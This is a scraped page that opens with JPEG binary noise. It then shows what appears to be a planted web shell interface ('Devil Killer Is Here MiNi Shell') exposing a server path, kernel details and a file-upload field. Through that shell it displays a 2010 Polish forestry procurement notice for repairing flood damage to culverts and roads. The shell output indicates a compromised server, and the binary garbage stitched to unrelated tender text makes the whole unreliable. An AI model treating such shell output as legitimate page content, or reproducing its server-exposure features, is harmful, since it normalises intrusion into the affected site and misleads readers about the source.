JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100908/283048-N-2010.html

<p class="kh_header"><b>Oleszyce: Usuwanie szkód powstałych w wyniku działania wód powodziowych na terenie Nadleśnictwa Oleszyce</b><br>
<b>Numer ogłoszenia: 283048 - 2010; data zamieszczenia: 08.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Oleszyce , ul. Zielona 4B, 37-630 Oleszyce, woj. podkarpackie, tel. 048 16 63 15 006, faks 048 16 63 15 665.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krosno.lasy.gov.pl/oleszyce</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: PGL Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usuwanie szkód powstałych w wyniku działania wód powodziowych na terenie Nadleśnictwa Oleszyce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1. Usuwanie szkód powstałych w wyniku działania wód powodziowych na  terenie Leśnictwa Czerniakowa Buda - określenie wielkości i zakresu zamówienia zamieszczono w ZAŁĄCZNIKU I Część Nr 1 
2. Usuwanie szkód powstałych w wyniku działania wód powodziowych na terenie Leśnictwa Dzików - określenie wielkości i zakresu zamówienia zamieszczono w ZAŁĄCZNIKU I Część Nr 2
3. Usuwanie szkód powstałych w wyniku działania wód powodziowych na  terenie Leśnictwa Futory - określenie wielkości i zakresu zamówienia zamieszczono w ZAŁĄCZNIKU I Część Nr 3.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zmawiający przewiduje możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień w okresie 3 lat od udzielenia zamówienia podstawowego, jeżeli zaistnieje możliwość ich finansowania i wykonania.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości: 
Dla zadania częściowego nr 1: 1 100.00 PLN (słownie: jeden tysiąc sto 00/100 PLN)
Dla zadania częściowego nr 2: 2 200.00 PLN (słownie: dwa tysiące dwieście 00/100 PLN)
Dla zadania częściowego nr 3: 300.00 PLN (słownie: trzysta 00/100 PLN)
2.Wadium należy wnieść  w terminie do dnia 2010-09-23 do godz. 09:00.
3. Wadium może być wnoszone w jednej lub kilku następujących formach:
a: pieniądzu:
przelewem na rachunek bankowy Zamawiającego: BGŻ o/Jarosław 11 2030 0045 1110 0000 0077 3870 nr SWIFT: GOPZPLW;
b: poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c: gwarancjach bankowych;
d: gwarancjach ubezpieczeniowych;
e: poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
4. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Prawo Zamówień Publicznych.
5. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
6. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
7. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy Prawo Zamówień Publicznych, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo Zamówień Publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo Zamówień Publicznych, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a: odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b: nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c: zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnianiu warunków</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany Umowy będą mogły być wprowadzane zgodnie z art. 144 ustawy Prawo zamówień publicznych w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający i Wykonawca nie przewidywali w chwili zawierania Umowy. 
Zmiany postanowień umowy mogą być dokonane według poniższych zasad:
Dopuszczalne są następujące zmiany treści umowy: 
1) zmiana sposobu wykonania zamówienia, materiałów budowlanych, sprzętu, urządzeń, gdy wykorzystanie materiałów budowlanych, sprzętu, urządzeń wskazanych w dokumentacji projektowej lub ofercie stanie się niemożliwe bądź podyktowane będzie usprawnieniem procesu budowy, postępem technologicznym, zwiększeniem bezpieczeństwa na budowie, 
2) zmiana wysokości wynagrodzenia umownego w związku z okolicznościami wymienionymi pkt 1,
3) zmiana terminu realizacji przedmiotu zamówienia, w przypadku: a) działania siły wyższej, uniemożliwiającego wykonanie robót w określonym pierwotnie terminie, b) zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie prac budowlanych lub spełnienie wymogów technologicznych, udokumentowanych w dzienniku budowy, c) błędów w dokumentacji projektowej, których usunięcie będzie poprzedzać konieczność konsultacji z projektantem i naniesienia przez niego poprawek lub zmian w projekcie, d) konieczności uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie robót, e) konieczności zmiany harmonogramu robót i finansowania, f) konieczności wykonania dodatkowych badań i ekspertyz, g) prac lub badań archeologicznych, wykopalisk, powodujących konieczność wstrzymania robót objętych niniejszą umową, h) realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań, w tym udzielenie w trakcie realizacji umowy zamówień dodatkowych i/lub uzupełniających, związanych z realizacją zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia jej realizacji (powodujących konieczność jego wydłużenia), i) wstrzymania realizacji robót przez uprawniony organ z powodu znalezienia niewybuchów i niewypałów, j) jakiegokolwiek opóźnienia, utrudnienia lub przeszkody spowodowane przez lub dające się przypisać Zamawiającemu, personelowi Zamawiającego lub innemu wykonawcy zatrudnionemu przez Zamawiającego na terenie budowy, k) wystąpienia odmiennych od zakładanych warunków geologicznych i terenowych, l) powierzenie Podwykonawcy określonego zakresu robót pod warunkiem, że Zamawiający nie zastrzegł, iż dana część zamówienia nie może być powierzona Podwykonawcom, m) zmiana przedstawicieli stron - kierownika budowy, kierowników robót - w przypadku niemożności pełnienia przez nich powierzonych funkcji (np. zdarzenia losowe, zmiana pracy, rezygnacja). 
Wyżej wymienione zmiany umowy dopuszczalne są na następujących warunkach: 
- ad pkt 1 - zamiana na materiały, urządzenia i sprzęt posiadające co najmniej takie same parametry jakościowe i cechy użytkowe, jak te, które stanowiły podstawę wyboru oferty oraz zmiana sposobu wykonania zamówienia powodująca usprawnienie procesu budowy, zwiększeniem bezpieczeństwa na budowie pod warunkiem nie zwiększania ceny; 
- ad pkt. 2) - w zakresie nie powodującym zwiększenia wynagrodzenia Wykonawcy określonego w niniejszej umowie, 
- ad pkt. 3): - lit. a) - o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania, - lit. b) - o czas trwania niesprzyjających warunków atmosferycznych, które uniemożliwią wykonanie zamówienia. - lit. c), d), e), f), g), h), i) ,j) , k), l), m) - o czas niezbędny do usunięcia przeszkody w prowadzeniu robót objętych przedmiotem umowy, lub o czas niezbędny do uzyskania wymaganych decyzji bądź uzgodnień lub do wykonania dodatkowych ekspertyz, badań.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krosno.lasy.gov.pl/oleszyce<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Oleszyce
ul. Zielona 4b 
37 - 630 Oleszyce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2010 godzina 09:00, miejsce: Nadleśnictwo Oleszyce
ul. Zielona 4b 
37 630 Oleszyce
Pokój nr 1 sekretariat Nadleśnictwa Oleszyce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> USUWANIE SZKÓD POWSTAŁYCH W WYNIKU DZIAŁANIA WÓD POWODZIOWYCH NA TERENIE LEŚNICTWA CZERNIAKOWA BUDA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usuwanie szkód powstałych w wyniku działania wód powodziowych na  terenie Leśnictwa Czerniakowa Buda obejmujące: 
1. Usuwanie szkód powodziowych w obrębie przepustu w oddz. 297 w ciągu drogi leśnej Nr 21 Stare Sioło - Cewków w Nadleśnictwie Oleszyce:
a) rozbiórkę ścianek czołowych przepustu z przerzutem urobku na odległości 8m - 5,80m3 ,
b) rozbiórkę poręczy stalowych na słupkach żelbetowych ze złożeniem obok - 24,0m,
c) zdjęcie humusu koparką grub. 15cm ze złożeniem urobku poza strefę robót - 128m2,
d) odkopanie przepustu koparką podsiębierną 0,60m3 w gr. kat. II, na szer. 3,6m, w poziomie posadowienia i 9,6 w poziomie jezdni, głęb. 3,0m ze skarpami 1:1, ze złożeniem urobku obok, z dodatkowym przerzutem części urobku koparką - 239,0m3,
e) przełożenie potoku - ułożenie rurociągu Pecor-Optima lub równoważnego O50cm w wykonanym wykopie, z wykonaniem ręcznie wykopu pod rurę, z przełożeniem koryta potoku przed wlotem - 12,0m,
f) wykonanie grodzy drewniano-ziemnej + rozebranie - 3,0m,
g) obsianie skarp mieszanką traw - 28,0m2,
h) wyprofilowanie istniejącego fundamentu z tłucznia, z zagęszczeniem - 20,0m2,
i) wykonanie podsypki z piasku grub. 10cm w stanie luźnym - 18,0m2,
j) ułożenie rurociągu z rury stalowej, spiralnie karbowanej typu HelCor lub równoważnego, na podsypce z piasku, przy pomocy koparki lub dźwigu z połączeniem dwóch odcinków złączką, z dodatkowym 2-krotnym przełożeniem rury koparką ze składu - 12,0 + 1,0kpl,
k) wypełnienie betonem przestrzeni pomiędzy rurą i ścianką czołową oraz wykończenie ścianek betonem - 1,0m3,
l) wykonanie podsypki wspierającej w pachwinach rurociągu miejscowym piaskiem z ubiciem ubijakami ręcznymi - 7,0m3,
m) rozebranie grodzy na potoku i rurociągu polietylenowego Pecor-Optima
lub równoważnego i skierowanie wody potoku do nowego rurociągu - 12,0m,
n) wykonanie zasypki rurociągu piaskiem z wykopu: podanie piasku koparką, rozścielenie warstwami do 30cm i zagęszczenie ręcznie,; zasypkę wykonać symetrycznie z obu stron rurociągu - 70,0m3,
o) wykonanie nasypu z gruntu pozyskanego z wykopu z zagęszczeniem - 92,0m3,
p) ubezpieczenie skarp wlotu i wylotu przepustu oraz koryta potoku brukiem kamiennym grub. 16-20cm, na podsypce cem.-piaskowej grub. 10cm, z zalaniem spoin zaprawą - 30,0m2,
q) obsianie skarp mieszanką traw - 28,0m2,
r) wykonanie podbudowy z tłucznia niesortowanego 0-60mm grub. 20cm, z wykonaniem koryta ręcznie - 33,0m2,
s) wykonanie warstwy wyrównawczej z tłucznia sortowanego 20-40mm, śr. grub. 7cm, zamkniętej klińcem - 313,0m2,
t) wykonanie nawierzchni bitumicznej z masy asfaltowo-mineralnej grysowo-żwirowej, grub. 5cm  - 276,0m2,
u) wykonanie utwardzenia poboczy - 46,0m2,
